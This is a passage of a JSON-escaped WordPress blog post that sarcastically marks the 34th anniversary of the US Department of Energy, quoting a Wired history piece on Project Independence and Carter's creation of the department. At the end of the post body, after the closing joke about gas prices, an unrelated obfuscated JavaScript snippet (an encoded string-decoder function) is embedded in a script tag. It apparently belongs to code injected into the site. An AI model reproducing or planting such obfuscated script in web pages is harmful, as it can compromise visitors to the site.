Instead, a number of smaller agencies, often working independently of one another, handled different aspects of the nation\u2019s energy needs. In the early years of the Atomic Age, for example, the military assumed responsibility for all nuclear-related issues.<\/p>\n<p>&#8230;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft\" style=\"margin: 5px;\" src=\"http:\/\/www.wired.com\/images_blogs\/thisdayintech\/2011\/08\/jimmy_carter_300px-292x300.jpg\" alt=\"\" width=\"175\" height=\"180\" \/>The Nixon administration responded [<em>to the 1973 Arab oil embargo &#8211; ed.<\/em>] with\u00a0<a href=\"http:\/\/www.time.com\/time\/magazine\/article\/0,9171,943755,00.html\">Project Independence<\/a> and the creation of the Federal Energy Office, the former intended to give the United States total energy independence by 1980 and the latter to manage a national energy policy. The energy program grew incrementally under the Nixon and Ford administrations, but remained diffuse.<\/p>\n<p>Jimmy Carter had acquired a technical background in nuclear propulsion as an engineering officer in the Navy. When he took office in 1977, he proposed creating a Cabinet-level \u00fcberagency that would consolidate everything energy-related \u2014 research, exploration, conservation, production and disposal \u2014 under its authority. The Energy Department would also be responsible for setting the national energy agenda and assuring nuclear safety.<\/p>\n<p>Congress passed the act, and Carter signed it Aug. 4. The\u00a0<a href=\"http:\/\/www.doe.gov\/\">Department of Energy<\/a> began operating Oct. 1, 1977.<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<p>Government programs have much shorter gestation periods and much longer lifespans than the humans who comprise them.<\/p>\n<p>But just look at the results! \u00a0For the last 34 years, we&#8217;ve had a <em>coherent energy policy!<\/em> That this policy appears to have been designed by monkeys trying to write Shakespeare, and has done to the country approximately what the chimps would do to the typewriters after a few minutes is beside the point. \u00a0It&#8217;s a <em>policy! <\/em>It&#8217;s <em>coherent! <\/em><\/p>\n<p>(And what came before, only set the stage. \u00a0Like most of Nixon&#8217;s forays into economic policy, Project Independence achieved all of its goals, and then some! \u00a0Oh, wait.)<\/p>\n<p>I particularly like the part about assuring nuclear safety. \u00a0Two years later, Three Mile Island imitated &#8220;art.&#8221; \u00a0It doesn&#8217;t actually say anything about ensuring the <em>availability<\/em> of nuclear power. \u00a0That would have to wait for <em>de<\/em>regulation, according to a <a href=\"http:\/\/ei.haas.berkeley.edu\/pdf\/working_papers\/WP217.pdf\" target=\"_blank\">new study<\/a> from UC Berkeley&#8217;s Haas School of Business.<\/p>\n<p>Wow. \u00a0Seems like only yesterday that gas cost $0.50.<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Thirty-four years. \u00a0It was a third of a century ago today, that the Department of Energy was born: Prior to 1973, the United States had no coherent energy policy.
